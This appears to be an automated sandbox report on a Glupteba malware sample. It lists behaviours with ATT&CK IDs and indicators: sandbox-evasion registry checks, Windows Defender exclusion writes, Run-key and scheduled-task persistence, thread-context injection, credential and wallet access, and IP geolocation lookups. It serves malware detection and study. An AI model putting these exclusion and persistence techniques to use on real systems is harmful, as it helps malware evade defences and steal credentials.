glupteba | dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d

System Information Discovery

Processes:

e4ErAuveBa5IH5z1QJUSx3vk.exej75BD_nP3E3g1bzeINMB3szz.exeKw6Nnl6pX4xf0ysVuA7zk9nk.exeQy_EMm7G77Re40IunmD_T4Wk.exeAodn_pUpVuL3dE2BvSg53rhb.exeInstall.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	e4ErAuveBa5IH5z1QJUSx3vk.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	j75BD_nP3E3g1bzeINMB3szz.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Kw6Nnl6pX4xf0ysVuA7zk9nk.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Qy_EMm7G77Re40IunmD_T4Wk.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Qy_EMm7G77Re40IunmD_T4Wk.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Aodn_pUpVuL3dE2BvSg53rhb.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Aodn_pUpVuL3dE2BvSg53rhb.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	e4ErAuveBa5IH5z1QJUSx3vk.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	j75BD_nP3E3g1bzeINMB3szz.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Kw6Nnl6pX4xf0ysVuA7zk9nk.exe

Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

File.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Control Panel\International\Geo\Nation File.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Control Panel\International\Geo\Nation	File.exe

Loads dropped DLL 64 IoCs

Processes:

dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exeFiles.exeGraphics.exepatch.execsrss.exeFile.exe

pid	process
1380	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe
1380	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe
1380	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe
1380	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe
1380	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe
1380	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe
1380	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe
1380	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe
1380	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe
1380	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe
1380	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe
1380	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe
1380	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe
1380	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe
1380	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe
1380	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe
1380	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe
1380	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe
1380	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe
1380	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe
1380	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe
1380	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe
1380	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe
1380	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe
1380	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe
1380	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe
1380	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe
1380	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe
1380	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe
1380	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe
1380	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe
1380	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe
1380	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe
1380	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe
1380	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe
1380	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe
1808	Files.exe
1808	Files.exe
1808	Files.exe
1808	Files.exe
660	Graphics.exe
660	Graphics.exe
876
1836	patch.exe
1836	patch.exe
1836	patch.exe
1836	patch.exe
1836	patch.exe
1836	patch.exe
1836	patch.exe
1836	patch.exe
1852	csrss.exe
1388	File.exe
1852	csrss.exe
1388	File.exe
1388	File.exe
1388	File.exe
1388	File.exe
1388	File.exe
1388	File.exe
1388	File.exe
1388	File.exe
1388	File.exe
1388	File.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Windows security modification 2 TTPs 10 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

Processes:

Graphics.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\Graphics.exe = "0"	Graphics.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows = "0"	Graphics.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	Graphics.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\wup = "0"	Graphics.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	Graphics.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	Graphics.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	Graphics.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\FragrantResonance = "0"	Graphics.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	Graphics.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	Graphics.exe

Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

Processes:

Graphics.exeFiles.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Windows\CurrentVersion\Run\FragrantResonance = "\"C:\\Windows\\rss\\csrss.exe\""	Graphics.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.ex"	Files.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 5 IoCs

evasion trojan

System Information Discovery

Processes:

e4ErAuveBa5IH5z1QJUSx3vk.exej75BD_nP3E3g1bzeINMB3szz.exeKw6Nnl6pX4xf0ysVuA7zk9nk.exeQy_EMm7G77Re40IunmD_T4Wk.exeAodn_pUpVuL3dE2BvSg53rhb.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	e4ErAuveBa5IH5z1QJUSx3vk.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	j75BD_nP3E3g1bzeINMB3szz.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Kw6Nnl6pX4xf0ysVuA7zk9nk.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Qy_EMm7G77Re40IunmD_T4Wk.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Aodn_pUpVuL3dE2BvSg53rhb.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

85 ipinfo.io
242 ipinfo.io
20 ip-api.com
84 ipinfo.io
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.

flow	ioc
85	ipinfo.io
242	ipinfo.io
20	ip-api.com
84	ipinfo.io

Drops file in System32 directory 2 IoCs

Processes:

Install.exepowershell.EXE

description	ioc	process
File created	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

IaQybWfoGh37ET5uWcailg0q.exe

pid process

2356 IaQybWfoGh37ET5uWcailg0q.exe

pid	process
2356	IaQybWfoGh37ET5uWcailg0q.exe

Suspicious use of SetThreadContext 7 IoCs

Processes:

e4ErAuveBa5IH5z1QJUSx3vk.exeKw6Nnl6pX4xf0ysVuA7zk9nk.exeAodn_pUpVuL3dE2BvSg53rhb.exeQy_EMm7G77Re40IunmD_T4Wk.exej75BD_nP3E3g1bzeINMB3szz.exe46fQNaBNg6BnGDUSYxz4Mr5h.exegqdlvptu.exe

description	pid	process	target process
PID 2212 set thread context of 2524	2212	e4ErAuveBa5IH5z1QJUSx3vk.exe	AppLaunch.exe
PID 2304 set thread context of 2608	2304	Kw6Nnl6pX4xf0ysVuA7zk9nk.exe	AppLaunch.exe
PID 2484 set thread context of 2680	2484	Aodn_pUpVuL3dE2BvSg53rhb.exe	AppLaunch.exe
PID 2436 set thread context of 2720	2436	Qy_EMm7G77Re40IunmD_T4Wk.exe	AppLaunch.exe
PID 2200 set thread context of 2656	2200	j75BD_nP3E3g1bzeINMB3szz.exe	AppLaunch.exe
PID 2364 set thread context of 2432	2364	46fQNaBNg6BnGDUSYxz4Mr5h.exe	46fQNaBNg6BnGDUSYxz4Mr5h.exe
PID 1044 set thread context of 2580	1044	gqdlvptu.exe	reg.exe

Drops file in Program Files directory 2 IoCs

Processes:

AJ6TC4hzLC0gagrPExdqgTJ2.exe

description	ioc	process
File created	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	AJ6TC4hzLC0gagrPExdqgTJ2.exe
File opened for modification	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	AJ6TC4hzLC0gagrPExdqgTJ2.exe

Drops file in Windows directory 4 IoCs

Processes:

makecab.exeschtasks.exeGraphics.exe

description	ioc	process
File created	C:\Windows\Logs\CBS\CbsPersist_20220314012030.cab	makecab.exe
File created	C:\Windows\Tasks\booXbIzkEgfNdKvxAC.job	schtasks.exe
File opened for modification	C:\Windows\rss	Graphics.exe
File created	C:\Windows\rss\csrss.exe	Graphics.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 2 IoCs

Processes:

WerFault.exeWerFault.exe

pid pid_target process target process

2640 2432 WerFault.exe 46fQNaBNg6BnGDUSYxz4Mr5h.exe
2568 2348 WerFault.exe qT3qkutpE2O_QhpJnMUTPThy.exe

pid	pid_target	process	target process
2640	2432	WerFault.exe	46fQNaBNg6BnGDUSYxz4Mr5h.exe
2568	2348	WerFault.exe	qT3qkutpE2O_QhpJnMUTPThy.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

pub2.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

P5uQo79iFYr86_unoYTsXVnM.exece22f1e7-e68d-4a15-bd06-190aea332387.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	P5uQo79iFYr86_unoYTsXVnM.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	P5uQo79iFYr86_unoYTsXVnM.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	ce22f1e7-e68d-4a15-bd06-190aea332387.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	ce22f1e7-e68d-4a15-bd06-190aea332387.exe

Creates scheduled task(s) 1 TTPs 6 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

2652 schtasks.exe
1500 schtasks.exe
1820 schtasks.exe
2852 schtasks.exe
1844 schtasks.exe
2824 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

776 timeout.exe
Enumerates processes with tasklist 1 TTPs 2 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exe

pid process

2616 tasklist.exe
2096 tasklist.exe

pid	process
2652	schtasks.exe
1500	schtasks.exe
1820	schtasks.exe
2852	schtasks.exe
1844	schtasks.exe
2824	schtasks.exe

pid	process
776	timeout.exe

pid	process
2616	tasklist.exe
2096	tasklist.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

System Information Discovery

Processes:

Install.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe

Kills process with taskkill 3 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exe

pid process

480 taskkill.exe
1160 taskkill.exe
3056 taskkill.exe

pid	process
480	taskkill.exe
1160	taskkill.exe
3056	taskkill.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

Graphics.exenetsh.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-511 = "Central Asia Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-111 = "Eastern Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-385 = "Namibia Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-121 = "SA Pacific Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-402 = "Arabic Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-842 = "Argentina Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1021 = "Bangladesh Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-103 = "Microsoft Corporation"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-232 = "Hawaiian Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-831 = "SA Eastern Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-212 = "Pacific Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-961 = "Paraguay Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-102 = "Microsoft Corporation"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-461 = "Afghanistan Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-362 = "GTB Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-342 = "Egypt Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-541 = "Myanmar Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-582 = "North Asia East Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-151 = "Central America Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-252 = "Dateline Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-561 = "SE Asia Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-132 = "US Eastern Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-100 = "EAP Quarantine Enforcement Client"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-262 = "GMT Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-491 = "India Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-532 = "Sri Lanka Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-201 = "US Mountain Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-392 = "Arab Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-282 = "Central Europe Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-581 = "North Asia East Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-962 = "Paraguay Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-601 = "Taipei Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-931 = "Coordinated Universal Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-522 = "N. Central Asia Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-382 = "South Africa Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-100 = "DHCP Quarantine Enforcement Client"	netsh.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-682 = "E. Australia Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-242 = "Samoa Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-102 = "1.0"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-661 = "Cen. Australia Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-161 = "Central Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-271 = "Greenwich Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-105 = "Central Brazilian Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-351 = "FLE Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-435 = "Georgian Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-231 = "Hawaiian Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-191 = "Mountain Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-301 = "Romance Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-102 = "1.0"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time"	Graphics.exe
